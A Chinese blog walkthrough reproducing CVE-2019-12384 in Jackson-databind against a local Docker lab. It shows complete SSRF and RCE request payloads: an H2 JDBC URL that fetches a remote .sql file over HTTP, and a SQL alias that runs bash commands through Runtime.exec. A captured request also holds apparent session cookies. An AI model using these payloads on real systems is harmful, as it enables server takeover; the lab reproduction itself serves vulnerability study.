CVE-2019-12384 jackson ssrf-rce漏洞复现

已于 2022-12-28 16:01:13 修改
阅读量728 收藏
点赞数
分类专栏: 渗透测试 漏洞复现 文章标签: 安全 web安全
于 2022-12-28 15:50:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZJT6666666/article/details/128466269
版权

1.漏洞描述

由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enableDefaultTyping方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的json数据包对应用进行攻击,直接获取服务器控制权限。

影响版本:Jackson-databind 2.X < 2.9.9.1

2.漏洞搭建

1、创建在桌面一个docker-compose 配置文件,命名为:CVE-2019-12384,里面添加配置文件:

version: '2'
services:
  web:
    image: tech1iu/servlet-with-jackson:2.9.8
    container_name: jackson-fuckme
    ports:
      -  "8080:8080"

 2、拉取和启动

docker-compose -f CVE-2019-12384 up -d

通过ps查看端口号

 访问搭建的环境(这种就代表环境搭建成功)

3.复现

1、SSRF

抓取搭建漏洞站点数据包,数据包如下:

POST /fuckme HTTP/1.1
Host: 192.168.3.137:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: pro_end=-1; ltd_end=-1; order=id%20desc; memSize=2978; sites_path=/www/wwwroot; serverType=nginx; backup_path=/www/backup; force=0; load_page=null; load_search=undefined; pnull=nullnot_load; uploadSize=1073741824; rank=a; SetName=; site_type=-1; ChangePath=3; vcodesum=9; SESScc3cfa2752cb20299766315b04dc7f8a=DUjfNVloT1dZgF2MyF2qjBGeEIPVWnRLF2aOvs7q808; request_token=S3WKG02B2DYSeyCaHQrfoZQfUirBwH1eq6sg9SYYhZnrvWFN; softType=10; load_type=10; Path=/www/server/panel/plugin/free_waf; aceEditor=%7B%22fontSize%22%3A%2213px%22%2C%22theme%22%3A%22monokai%22%7D
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 111

poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://xx.xx.xx.xx:7777/"}]

nc监听payload里面的7777端口,通过payload的使用,监听的端口可以收到信息。

2、RCE

在物理机上放一个恶意的.sql文件,然后利用ssrf漏洞去请求恶意文件:la.sql:

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('touch shell.txt')

 发送payload,请求远程的sql文件,进行RCE

数据包:

POST /fuckme HTTP/1.1
Host: 192.168.3.137:8080
Proxy-Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.3.137:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 162
Content-Type: application/x-www-form-urlencoded

poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.3.37/la.sql'"}]

进入容器验证是否创建shell.txt

 复现成功。

参考:https://github.com/0xlane/vu1hub/tree/master/jackson/CVE-2019-12384-RCE

你能拿我咋的
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jackson反序列化远程代码执行漏洞CVE-2020-24616)复现
锋刃科技的博客
04-26 2682
简介 FasterXML Jackson是美国FasterXML公司的一款适用于Java的数据处理工具。jackson-databind是其中的一个具有数据绑定功能的组件。 影响版本 jackson-databind < 2.9.10.6 环境搭建 搭建一个Java项目,新建一个Poc类,下载并导入存在漏洞的包 导入存在漏洞的包 exp文件 编译并启动环境 javac Exploit.java py -3 -m http.server 88...
Jackson 反序列化远程代码执行漏洞复现
Ms08067安全实验室
07-24 2221
本文作者:light(Ms08067实验室 SRSP TEAM小组成员)jackson介绍Jackson是一个能够将java对象序列化为JSON字符串,也能够将JSON字符串反序列化为j...
Jackson_RCE-CVE-2019-12384:CVE-2019-12384 漏洞测试环境
05-26
环境搭建 将项目导入到idea,再配置好maven之后设置自动导入依赖库,然后在本地的web空目录写入如下文件,保存为exec.sql。并启动一个http server: CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { String[] command = {"/bin/bash", "-c", cmd}; java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\0A"); return s.hasNext() ? s.next() : ""; } $$; CALL SHEL
2024年网络安全最新再爆安全漏洞,这次轮到Jackson了,竟由阿里云上报
最新发布
2401_84297455的博客
05-03 1112
熟悉A哥的小伙伴知道,自从Fastjson上次爆出重大安全漏洞之后,我彻底的投入到了Jackson的阵营,工作中也慢慢去Fastjson化。
Jackson-databind 反序列化漏洞CVE-2017-7525)复现
HEAVEN569的博客
03-12 1888
1.漏洞出现的原因 Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当json字符串转换的Target class中有polymorph fields,即字段类型为接口、抽象或Object类型时,攻击者可以通过在json字符串中指定变量的具体类型(子类或者接口实现类,)来实现实例化指定的类,借助某些特殊的class,如TemplatesImpl,可以实现任意代码执行。 所以本漏洞利用条件如下 1.开启JacksonPo..
(环境搭建+复现CVE-2019-12384 Jackson 远程代码执行漏洞
daxi0ng的博客
03-30 4223
1、【CVE编号】 CVE-2019-12384 2、【漏洞名称】 Jackson 远程命令执行漏洞 3、【靶标分类】 Web类型类靶标 4、【影响版本】 Jackson-databind 2.X < 2.9.9.1 5、【漏洞分类】 代码执行 6、【漏洞等级】 高 7、【漏洞简介】 由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enab...
jackson 反序列化string_漏洞预警|Jackson远程代码执行高危漏洞分析(CVE201912384)...
weixin_35128151的博客
11-29 630
漏洞描述近日,HSCERT监测到,国外安全研究员在分析一个使用Jackson库对JSON进行反序列化的应用程序时,发现了一个反序列化漏洞,可以控制要反序列化的类。我们分析复现如何利用此反序列化漏洞来触发服务器端请求伪造(SSRF)漏洞和远程代码执行漏洞(RCE)。漏洞对应的编号为CVE-2019-12384,RedHat的多个分支受该漏洞影响,如下所示:触发条件触发这个Jackson漏洞...
Jackson 反序列化漏洞原理
王嘟嘟的博客
02-28 2877
Jackson 最基础的功能就是将制定的类 序列化 to json,然后json to 序列化的这样一个工具第三方库,正常情况下因为需要执行类进行转换,所以除非是故意留有后门,否则是不会出现问题的。但是为了处理一个情况,就是处理未知的json转换的时候,需要对多种场景进行处理。于是就有了Jackson多态机制。如:需要处理多个子类的情况。那么当json中的指定的类的seter或者无参构造方法中存在可利用点的时候,就会造成有效的反序列化攻击。也就是需要找的反序列化调用链。
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
CVE-2020-8840:Jackson-databind RCE
Fly_鹏程万里
07-11 2463
影响范围 jackson-databind before 2.9.10.3 jackson-databind before2.8.11.5 jackson-databind before2.7.9.7 漏洞类型 JDNI注入导致RCE 利用条件 开启enableDefaultTyping() 使用了org.apache.xbean.propertyeditor.JndiConverter第三方依赖 漏洞概述 2020年2月,jackson-databind在github上更新了一个新的反..
vulhub漏洞复现29_Jackson
weixin_44193247的博客
02-03 1018
vulhub漏洞复现练习篇
fastjson(反序列化)漏洞复现
weixin_58954236的博客
09-11 1192
​ FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。近几年来FastJson漏洞层出不穷。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。​ 关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。
Jackson-databind引发的漏洞问题分析
kshzhaohui的专栏
03-25 7686
前言 最近公司内部提供了一份应用高危漏洞的清单,其中提到了fastjson和jackson,因为之前对fastjson因为多态问题引发的反序列化问题有过了解,所以打算也做一个简单的分析。 漏洞简述 2020年08月27日,360CERT监测发现 jackson-databind 发布了 jackson-databind 序列化漏洞 的风险通告,该漏洞编号为 CVE-2020-24616 ,漏洞等级:高危,漏洞评分:7.5。 br.com.anteros:Anteros-DBCP 中存在新的反序列化利用链,
[JAVA安全]JACKSON反序列化
snowlyzz的博客
01-28 2040
JACKSON反序列化原理
Jackson 远程命令执行漏洞CVE-2019-12384
锋刃科技的博客
06-26 8160
前言 由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enableDefaultTyping方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的json数据包对应用进行攻击,直接获取服务器控制权限。 影响版本 Jackson-databind 2.0.0 ~2.9.9.1 环境搭建 创建一个docker-compose.yml的文件 version: '2' services: web: image: te
jackson框架java反序列化漏洞_预警Jackson < 2.9.9.1 反序列化远程代码执行漏洞(CVE-2019-12384)...
weixin_42540248的博客
03-06 567
2019年7月23日,本站安全专题监测到有安全研究人员披露Jackson < 2.9.9.1 存在反序列化远程代码执行漏洞(CVE-2019-12384),利用可导致远程执行服务器命令,官方git已发布公告说明,请使用到Jackson的用户尽快升级至安全版本。漏洞描述Jackson是一套开源java高性能JSON处理器,其在反序列化处理JSON格式时存在缺陷,当用户提交一个精心构造的恶意JS...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-144391
07-14
你提到的 Jackson 最新反序列化漏洞CVE-2019-14361 和 CVE-2019-14439。这些漏洞都是与 Jackson 库中的反序列化功能相关的安全问题。 CVE-2019-14361 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.9.x 版本。 CVE-2019-14439 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.6.x 至 2.9.x 版本。 为了解决这些漏洞,建议开发人员尽快升级到最新版本的 Jackson-databind 库。另外,还可以考虑限制反序列化操作的使用,以减少潜在的风险。记住及时关注安全公告,并采取相应的措施来保护应用程序免受可能的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值